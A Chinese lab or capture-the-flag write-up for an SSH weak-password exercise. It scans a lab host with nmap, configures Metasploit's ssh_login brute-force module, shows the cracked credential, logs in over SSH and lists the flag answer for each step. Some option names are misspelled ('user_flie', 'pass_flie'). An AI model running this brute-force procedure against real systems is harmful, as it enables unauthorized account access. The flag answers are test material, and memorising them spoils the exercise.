SSH弱口令渗透测试

任务环境说明：
服务器场景：Linux
服务器场景操作系统：Linux（版本不详）
渗透机环境说明：
BT5渗透机用户名：root密码：toor
Kali渗透机用户名：root密码：toor
Windows7渗透机用户名：administrator密码：123456

靶机场景 19-JY-Linux--1 172.16.102.250

1.在BT5中使用Zenmap工具扫描服务器场景Linux所在网段(例如：172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为Flag提交（忽略ip地址）；

flag[-p 21,22,23]

在终端中输入

nmap -p 21,22,23

2.通过BT5对服务器场景Linux进行系统服务及版本扫描渗透测试，并将该操作显示结果中SSH服务对应的服务端口信息作为Flag提交；

flag[22/tcp]

在终端输入

nmap -p 21,22,23

由上图得出结果

3.在BT5中使用MSF模块对其爆破，使用search命令，并将扫描弱口令模块的名称信息作为Flag提交；

flag[auxiliary/scanner/ssh/ssh_login]

在终端输入

msfconsole

在msf6下 输入

use ssh_login

找到auxiliary/scanner/ssh/ssh_login这个模块得到flag

输入use 0

进入模块

输入

show options

查看配置文件

4.在上一题的基础上使用命令调用该模块，并查看需要配置的信息（使用show options命令），将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为Flag提交（之间以英文逗号分隔，例hello,test，..,..）；

flag[RHOSTS,PASS_FILE,THREADS,USERNAME]

我们由上图得出flag值

5.在msf模块中配置目标靶机IP地址，将配置命令中的前两个单词作为Flag提交；

flag[set RHOSTS]

下面我们要修改配置文件

首先我们需要两个字典

一个作为用户名字典，一个为密码字典

下面修改

set user_flie /root/zidian/2-1yhm.txt #设置用户名字典

set pass_flie /root/zidian/2-1mm.txt #设置密码字典

set rhosts 172.16.102.250 #设置目标靶机ip地址

set threads 10 #设置线程为10

set verbose true #修改爆破记录可见

最后show options 查看配置是否正确

确认正确

输入

run

运行

可以看到账号密码被爆出

172.16.102.250:22 - Success: 'test:aaabc3' 'uid=500(test) gid=500(test) groups=500(test) Linux localhost.localdomain 2.6.32-642.el6.x86_64 #1 SMP Tue May 10 17:27:01 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '

看到正确爆破后

按Ctrl+z停止

6.在msf模块中指定密码字典，字典路径为/root/2.txt，用户名为test爆破获取密码并将得到的密码作为Flag提交；

flag[aaabc3]

从上一步得出flag结果

7.在上一题的基础上，使用第6题获取到的密码SSH到靶机，将test用户家目录中唯一一个后缀为.bmp图片的文件名的字符串作为Flag提交。

下面我们在终端输入

ssh test@172.16.102.250

输入爆破得出的密码aaabc3登录ssh

利用获得的密码登录ssh将test用户家目录中唯一一个后缀为.bmp图片的文件名的字符串作为Flag提交

flag[nauiwrevy]

进入靶机后我们可以输入pwd查看当前路径

根据题目要求进入test用户home文件夹下查询后缀以bmp结尾的图片文件

将图片文件的文件名作为flag值上交

我们进入home文件夹后输入命令find查询当前文件夹下所有文件